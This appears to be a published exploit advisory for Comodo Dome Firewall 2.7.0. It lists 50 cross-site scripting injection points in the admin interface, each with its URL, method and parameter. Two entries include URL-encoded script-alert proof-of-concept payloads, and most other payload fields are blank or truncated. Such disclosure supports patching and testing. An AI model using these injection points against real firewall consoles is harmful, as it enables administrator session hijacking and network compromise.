################################################################################################################################## # Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting # Date: 18.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://cdome.comodo.com/firewall/ # Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278 # Version: 2.7.0 ################################################################################################################################## Introduction Comodo Dome Firewall (DFW) provides comprehensive security for enterprise networks. The firewall software can be installed on a physical system or a virtual machine. Dome Firewall simplifies the overall management of network security by delivering a single interface through which administrators can control firewall policy, antivirus, intrusion prevention, website filtering, traffic monitoring, VPN and proxy servers. Dome Firewall also features highly configurable notifications, in-depth reporting and an informative dashboard which offers a panoramic view of all major settings and network events. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:10443/korugan/login METHOD Post PARAMETER username PAYLOAD "> ################################################################################# XSS2 | Stored URL https://192.168.2.200:10443/korugan/admin_profiles METHOD Post PARAMETER comment PAYLOAD ################################################################################# XSS3 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER admin_name PAYLOAD ################################################################################# XSS4 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER name PAYLOAD ################################################################################# XSS5 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER surname PAYLOAD ################################################################################# XSS6 | Stored URL https://192.168.2.200:10443/korugan/license_activation METHOD Post PARAMETER newLicense PAYLOAD ################################################################################# XSS7 | Reflected URL https://192.168.2.200:10443/korugan/cmclient METHOD Post PARAMETER organization PAYLOAD "> ################################################################################# XSS8 | Reflected URL https://192.168.2.200:10443/korugan/backupschedule METHOD Post PARAMETER BACKUP_RCPTTO PAYLOAD ################################################################################# XSS9 | Reflected URL https://192.168.2.200:10443/korugan/netwizard2 METHOD Post PARAMETER netmask_addr PAYLOAD ################################################################################# XSS10 | Reflected URL https://192.168.2.200:10443/korugan/routing METHOD Post PARAMETER destination PAYLOAD ################################################################################# XSS11 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER source PAYLOAD ################################################################################# XSS12 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER destination PAYLOAD ################################################################################# XSS13 | Reflected URL https://192.168.2.200:10443/korugan/dhcp METHOD Post PARAMETER GATEWAY_GREEN PAYLOAD ################################################################################# XSS14 | Reflected URL https://192.168.2.200:10443/korugan/time METHOD Post PARAMETER NTP_SERVER_LIST PAYLOAD ################################################################################# XSS15 | Reflected URL https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop METHOD Get PARAMETER ID PAYLOAD ################################################################################# XSS16 | Reflected URL https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off METHOD Get PARAMETER ID PAYLOAD ################################################################################# XSS17 | Reflected URL https://192.168.2.200:10443/korugan/hotspot_permanent_users METHOD Post PARAMETER MACADDRESSES PAYLOAD ################################################################################# XSS18 | Reflected URL https://192.168.2.200:10443/manage/qos/devices/ METHOD Post PARAMETER device PAYLOAD ################################################################################# XSS19 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER protocol PAYLOAD ################################################################################# XSS20 | Reflected URL https://192.168.2.200:10443/korugan/fwgroups METHOD Post PARAMETER FWADDRESSES PAYLOAD ################################################################################# XSS21 | Stored URL https://192.168.2.200:10443/korugan/schedule METHOD Post PARAMETER SCHNAME PAYLOAD ################################################################################# XSS22 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER port PAYLOAD ################################################################################# XSS23 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER snat_to_ip PAYLOAD ################################################################################# XSS24 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER mac PAYLOAD ################################################################################# XSS25 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER target PAYLOAD ################################################################################# XSS26 | Stored URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER remark PAYLOAD ################################################################################# XSS27 | Reflected URL https://192.168.2.200:10443/korugan/vpnfw METHOD Post PARAMETER target PAYLOAD ################################################################################# XSS28 | Stored URL https://192.168.2.200:10443/korugan/vpnfw METHOD Post PARAMETER remark PAYLOAD ################################################################################# XSS29 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER PROXY_PORT PAYLOAD ################################################################################# XSS30 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER VISIBLE_HOSTNAME PAYLOAD ################################################################################# XSS31 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER ADMIN_MAIL_ADDRESS PAYLOAD ################################################################################# XSS32 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER CACHE_MEM PAYLOAD ################################################################################# XSS33 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MAX_SIZE PAYLOAD ################################################################################# XSS34 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MIN_SIZE PAYLOAD ################################################################################# XSS35 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER DST_NOCACHE PAYLOAD ################################################################################# XSS36 | Reflected URL https://192.168.2.200:10443/korugan/https_exceptions METHOD Post PARAMETER EXCEPTIONSITELIST PAYLOAD ################################################################################# XSS37 | Reflected URL https://192.168.2.200:10443/korugan/smtpconfig METHOD Post PARAMETER VIRUS_ADMIN PAYLOAD ################################################################################# XSS38 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD ################################################################################# XSS39 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD ################################################################################# XSS40 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_WHITELIST PAYLOAD ################################################################################# XSS41 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_BLACKLIST PAYLOAD ################################################################################# XSS42 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER username PAYLOAD ################################################################################# XSS43 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER remotenets PAYLOAD ################################################################################# XSS44 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER explicitroutes PAYLOAD ################################################################################# XSS45 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER static_ip PAYLOAD ################################################################################# XSS46 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_dns PAYLOAD ################################################################################# XSS47 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_domain PAYLOAD ################################################################################# XSS48 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_NETWORKS PAYLOAD ################################################################################# XSS49 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_DNS PAYLOAD ################################################################################# XSS50 | Reflected URL https://192.168.2.200:10443/korugan/vpn_users METHOD Post PARAMETER username PAYLOAD #################################################################################